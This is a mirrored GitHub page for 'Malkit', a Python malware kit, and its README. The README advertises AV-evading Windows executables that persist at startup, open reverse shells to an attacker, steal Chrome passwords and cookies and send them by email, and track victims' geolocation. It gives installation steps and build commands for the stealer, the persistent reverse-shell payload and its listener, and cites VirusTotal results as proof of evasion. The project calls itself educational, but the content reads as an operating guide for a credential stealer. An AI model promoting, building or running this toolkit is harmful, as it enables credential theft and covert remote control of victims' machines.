https://github.com/darkarp/malkit
Full malware Kit
https://github.com/darkarp/malkit
Last synced: over 1 year ago
JSON representation
Full malware Kit
- Host: GitHub
- URL: https://github.com/darkarp/malkit
- Owner: darkarp
- License: agpl-3.0
- Created: 2019-12-03T10:34:23.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2021-03-18T09:16:51.000Z (over 5 years ago)
- Last Synced: 2025-03-18T06:22:53.387Z (over 1 year ago)
- Language: Python
- Size: 567 KB
- Stars: 57
- Watchers: 11
- Forks: 10
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
Malkit - Full malware kit
## Table of Contents
* [About the Project](#about-the-project)
* [AV Detection](#av-detection)
* [Getting started](#getting-started)
* [Prerequisites](#dependencies-and-requirements)
* [Installation](#installation)
* [Usage](#usage)
* [Todo](#todo)
* [Errors, Bugs and Feature Requests](#errors-bugs-and-feature-requests)
* [Learn More](#learn-more)
* [License](#license)
## About The project
Malkit is a python-based console application that generates runtime-decrypted undetectable windows executables.
It has the following features:
- Copying itself into startup as a legitimate application
- Connecting back to an attacker via reverse shell
- Custom listener with upload, download and modular capability (in progress)
- Chromepass feature:
- Decrypt Chrome saved paswords ad well as all cookies
- Send a file with the login/password combinations remotely (email or reverse shell)
- Send a file with all the extracted cookies as well as another file with possible email-related cookies
- Custom icon
- Custom error message
- Accurate location reporting. It can detect and send back a victim's accurate geolocation (not ip-based) (X)
- Easy to use
- Completely undetectable by AV engines
Features marked with an X are still in development and aren't fully working but are already complete in internal testing.
### AV Detection!
Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed
- [From build_malware](https://www.virustotal.com/gui/file/61fc9c4ad472a240f4fd010958a0b0210f6513ed878bd47b90e25da871e52068/detection)
- [From build_chromepass](https://antiscan.me/scan/new/result?id=kmpsMNccfuRJ)
- Both scans yielded the result: 1/69 detections. The sole detection is a false positive by Sangfor Engine Zero. I tried submitting a simple hello world program for analysis and the same AV detected it as malware as well.
- This is an educational project first and foremost, so distribution (or the lack thereof) is not a concern, hence the usage of VirusTotal
## Getting started
### Dependencies and Requirements
For this application you need:
* [Python] - Only tested on 3.7.5 on Anaconda environment but should work in 3.6+ (Doesn't work in 3.8 yet). No need to download it from here, just follow [Installation below](#installation)
* ~~[VS build tools] - This is required to build some requirements. Please download it, install it and restart your computer **BEFORE** proceding to [Installation](#installation)~~ No longer needed due to last update. However, should you not be able to install the `requirements.txt`, open the file and downgrade `pexe37` to `0.9.6.4` and `darkarp` to `3.4` (ONLY if you get errors when installing the `requirements.txt`. For now, just go to [Installation](#installation) )
### Installation
Chromepass requires [Python] 3.6+ to run.
It has been tested on a full anaconda installation but it doesn't necessariliy require it. It doesn't work with Python 3.8 yet
The instructions on the full setup are below.
**Setup Anaconda environment:**
- Visit [Anaconda](https://www.anaconda.com/distribution/#download-section) and download the graphical installer for windows.
- Run the installer and make sure you select the checkbox "Add conda to path", even though it isn't recommended.
- Open up a **new** powershell window **as administrator** and run:
- `Set-ExecutionPolicy RemoteSigned`
- Press `A` when it prompts you.
- Close this window
- Open up a normal powershell and enable conda to use it:
- `conda init powershell`
- Close and open a new powershell and update conda:
- `conda update conda`
- Create a new anaconda environment:
- `conda create -n malkit python=3.7`
- Activate your environment:
- `conda activate malkit`
- Note: Every time you open a new powershell and want to run malkit you need to activate your environment.
**Clone the Repository and access its directory:**
```powershell
> git clone https://github.com/darkarp/malkit.git
> cd malkit
```
**Install the dependencies:**
```powershell
> pip install -r requirements.txt
```
If any errors occur make sure you're running on the proper environment (if applcable) and that you have python 3.6+ < 3.8 (preferably 3.7.5).
If the errors persist, try:
```powershell
> python -m pip install --upgrade pip
> python -m pip install -r requirements.txt
```
If any errors **still** persist, make sure you have the following installed:
* [VS build tools]
## Usage
* Show the help screen
- `python malkit.py -h`
```
usage: python malkit.py [-h] {build_listener, build_malware, build_chromepass} ...
positional arguments:
{build_listener, build_malware, build_chromepass}
optional arguments:
-h, --help show this help message and exit
```
* Access the help menu for individual arguments
- `python malkit.py build_chromepass -h`
```
usage: python malkit.py build_chromepass [-h] [--load] [--email] [--reverse_shell]
[--no_error]
[--errormsg Error message to appear]
[--address Email address to send details to, if Email was chosen]
[--port Port for reverse connection, if Reverse shell was chosen.]
[--host Host reverse connection, if Reverse shell was chosen.]
optional arguments:
-h, --help show this help message and exit
--load
--email
--reverse_shell
--no_error
--errormsg Error message to appear
--address Email address to send details to, if Email was chosen
--port Port for reverse connection, if Reverse shell was chosen.
--host Host reverse connection, if Reverse shell was chosen.
example:
python malkit.py build_chromepass --email --address myemail@gmail.com
python malkit.py build_chromepass --reverse_shell --host 127.0.0.1 -p 4444
python malkit.py build_chromepass --load myfile.conf
```
* Building an executable that grabs and sends chrome-saved passwords through email
- `python malkit.py build_chromepass --email --address youremailaddress@yourdomain.com`
* Creating a persistent reverse_shell with additional features
- `python malkit.py build_malware --host 127.0.0.1 -p 444`
- Replace the host with your external/internal ip as needed
- Replace the port as needed
- Make sure you build the listener as well and run it.
* Creating a listener for the malware
- `python malkit.py build_listener -p 444`
- This is the listener for the malware
- While in the shell, you can use the `list` command to see active sessions.
- You can interact with a session by using the command: `interact::SESSION_NUMBER` where `SESSION_NUMBER` is the number of the session you want to connect with.
- To go back into listener mode after interacting with a session, use the command ` MIT
[Python]:
[VS build tools]: